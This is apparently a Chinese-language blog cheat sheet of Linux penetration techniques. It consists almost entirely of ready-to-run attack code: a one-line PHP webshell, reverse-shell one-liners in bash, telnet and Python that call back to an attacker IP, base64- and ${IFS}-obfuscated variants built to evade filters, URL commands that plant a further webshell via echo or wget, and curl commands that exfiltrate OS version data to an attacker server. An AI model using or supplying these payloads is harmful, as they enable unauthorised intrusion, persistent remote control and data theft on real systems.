摘要:记录一下linux下常用渗透手法

反弹bashshell

php环境

php木马如下:

<?php @system($_GET['cmd']) ?>

对应的反弹bash命令如下(注意拼接到url中的时候需要进行urlencode编码):

// 将192.168.1.111、443分别替换为服务器的ip地址、端口
bash -c "bash -i >& /dev/tcp/192.168.1.111/443 0>&1"

telnet 192.168.1.111 2000 | /bin/bash | telnet 192.168.1.111 5555

/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.111",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# 不指定路径版本,比较通用
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.111",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMTEvMjAwMCAwPiYx" | base64 -d | bash

echo${IFS}"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMTEvMjAwMCAwPiYx"${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash

植入webshell

php环境

php木马如下:

<?php @system($_GET['cmd']) ?>
https://192.168.1.2/admin/test.php?cmd=echo '<?php @system($_GET["config"]) ?>' > ./config.php
https://192.168.1.2/admin/test.php?cmd=wget -O ./config.php http://xx.xx.xx/config.php

查看linux版本

bash命令

uname -a
cat /etc/*release
cat /etc/issue
lsb_release -a

url带出版本

# 在192.168.1.111启动一个web服务器,即可获取目标机器内核信息
curl http://192.168.1.111/test$(grep PRETTY_NAME /etc/os-release | cut -d'=' -f2 | tr -d '"')
curl "http://192.168.1.111/info$(lsb_release -d -s)"
文章目录